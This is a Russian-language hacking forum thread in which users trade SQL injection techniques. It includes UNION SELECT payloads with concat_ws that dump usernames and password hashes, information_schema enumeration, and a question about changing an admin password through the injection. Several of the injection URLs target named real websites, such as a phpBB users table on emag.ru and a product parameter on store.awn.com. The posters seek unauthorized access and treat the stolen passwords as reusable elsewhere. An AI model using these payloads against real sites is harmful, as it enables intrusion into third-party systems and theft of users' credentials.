если при подстановки в параметарезированный линк кавычки появляется надпись: An error occurred on the server when processing the URL. Please contact the system administrator. Означет ли это, что во всех остальных параметрах будет точно такая же надпись? П.С. С конструкцией and ошбки не выдает,но обычные страницы показывает. И еще один вопрос, если при подстановки кавычки появляется пустая страница, то как(кроме запросаand и метода вычислений) заставить вывести имя субд и т.д.?
после этой команды concat_ws(0x3a,LOGIN) я вижу логины пользователей через запятую. Как сделать так что бы логины пользователей отображались в столбик? тоесть следущий логин начинался с новой строки.
не знаю почему через кому...должно по идеи через двоеточие,но что б в столбик попробуй concat_ws(0x0a,LOGIN)
по данному адресу id=1+union+select+1,2,3,4,concat_ws(0x3a,USERNAME,PASSWORD)6,7,8,9,10+from+USERS+--+ я вижу логин и пасс админа. я его знаю, но админку у него найти так и не смог. как мне через скул поменять ему пасс.
XXXXXX, concat_ws('<br>',LOGIN) это чтобы в столбик было select concat_ws('<br>',LOGIN,PASSWORD) from USERS
Смотря какая скуль - если в select - то тока читать, если в update или в insert - то изменять и вставлять
все настройки веб сервера, а именно: пути, где располагаются сайты, модули которые подключены к веб серверу, настройки пхп, перла и так далее и тому подобное; куда приинклудены дополнительные настройки, такие как виртуальные хосты, и так далее и тому подобное.
подскажите у меня руки кривые или вывода нет?? http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user_password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit+5,1000
мега шоп, с ПР5. помогите раскрутить. при попытках присвоить переменной productid значения -1 или 99999999999 или 1+and+1=1 редиректит на страницу "acess denied" http://store.awn.com/product.php?productid=15'
таблица phpbb_users находится в базе данных SC: Code: http://www.emag.ru/pr.php?pr=-10+union+select+1,TABLE_SCHEMA,3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=char(0x70687062,0x625f7573,0x657273) причем доступа туда нет. Но легко можно прочитать записи из таблицы phpbb_users1, что в базе данных acom: Code: http://www.emag.ru/pr.php?pr=-10+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10+from+acom.phpbb_users1+limit+1,1 может эти пароли куда-то и подойдут